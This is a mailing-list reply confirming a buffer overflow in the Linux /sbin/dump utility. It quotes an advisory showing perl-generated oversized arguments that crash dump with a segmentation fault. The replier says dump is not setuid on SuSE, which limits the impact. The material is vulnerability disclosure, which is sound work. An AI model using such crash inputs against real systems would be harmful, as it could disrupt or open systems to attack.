Re: [ Hackerslab bug_paper ] Linux dump buffer overflow

[hdm () SECUREAUSTIN COM (H D Moore)]

Hi, 

Confirmed this on SuSE 6.2.  The magic number of bytes is 347.  Dump is
not su/gid so this seems to be more of an annoyance than a security
issue for SuSE boxen (not sure of others).

-HD

"±è¿ëÁØ KimYongJun (99Á¹¾÷)" wrote:
> [ Hackerslab bug_paper ] Linux dump buffer overflow
>
> File   :   /sbin/dump
>
> SYSTEM :   Linux
>
> INFO :
>
> The problem occurs when it gets the argument.
> It accepts the argument without checking out its length, and this causes the problem.
>
> It seems that this vulnerability also applies to RedHat Linux 6.2beta,
> the latest version.
>
> [loveyou@loveyou SOURCES]$ dump  -f a `perl -e 'print "x" x 556'`
>   DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000
>   DUMP: Date of last level  dump: the epoch
>   DUMP: Dumping 
> xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a
> xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:
>  ÆÄÀÏ À̸§ÀÌ ³Ê¹« ±é´Ï´Ù while opening filesystem
>   DUMP: SIGSEGV: ABORTING!
> Segmentation fault
>
> [loveyou@loveyou SOURCES]$ dump  -f a `perl -e 'print "loveyou" x 556'`
>   DUMP: SIGSEGV: ABORTING!
> Segmentation fault    <=  occur ctime4()